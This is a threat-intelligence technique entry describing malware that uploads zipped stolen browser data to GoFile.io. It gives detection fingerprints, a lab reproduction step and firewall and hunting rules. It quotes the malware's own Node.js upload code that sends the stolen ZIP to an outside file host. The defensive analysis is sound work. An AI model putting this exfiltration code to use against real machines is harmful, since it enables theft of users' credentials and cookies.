typetechniquecreated2026-08-21updated2026-08-21exfiltrationc2mitre-attck

GoFile.io Exfiltration

Malware exfiltrates stolen data by uploading ZIP archives to GoFile.io, a free file-hosting service that requires no authentication. The uploaded files are then shared with the operator via the returned download URL, often relayed through Discord webhook or Telegram Bot API messages.

Detection / Fingerprint

  • HTTP POST requests to *.gofile.io/uploadFile
  • Content-Type: multipart/form-data with file field
  • Response parsing for .data.downloadUrl or .data.link
  • Node.js form-data module usage alongside axios.post

Implementation Patterns Observed

In novashadow stolen browser data is compressed into a ZIP (via adm-zip), then uploaded via:

const form = new FormData();
form.append('file', fs.createReadStream(zipPath));
const res = await axios.post(`https://${server}.gofile.io/uploadFile`, form, { headers: form.getHeaders() });
const downloadUrl = res.data.data.downloadUrl;

Reproduce on Your Own VMs

  1. Create a test ZIP file
  2. Upload via curl:
    curl -F "file=@test.zip" https://store1.gofile.io/uploadFile
    
  3. Extract the downloadUrl from the JSON response

Defensive Countermeasures

  • Block *.gofile.io at the proxy/firewall layer
  • Alert on multipart/form-data uploads from Node.js processes
  • Hunt for processes writing BrowserData.zip or *_cookies.zip to %TEMP% followed by network uploads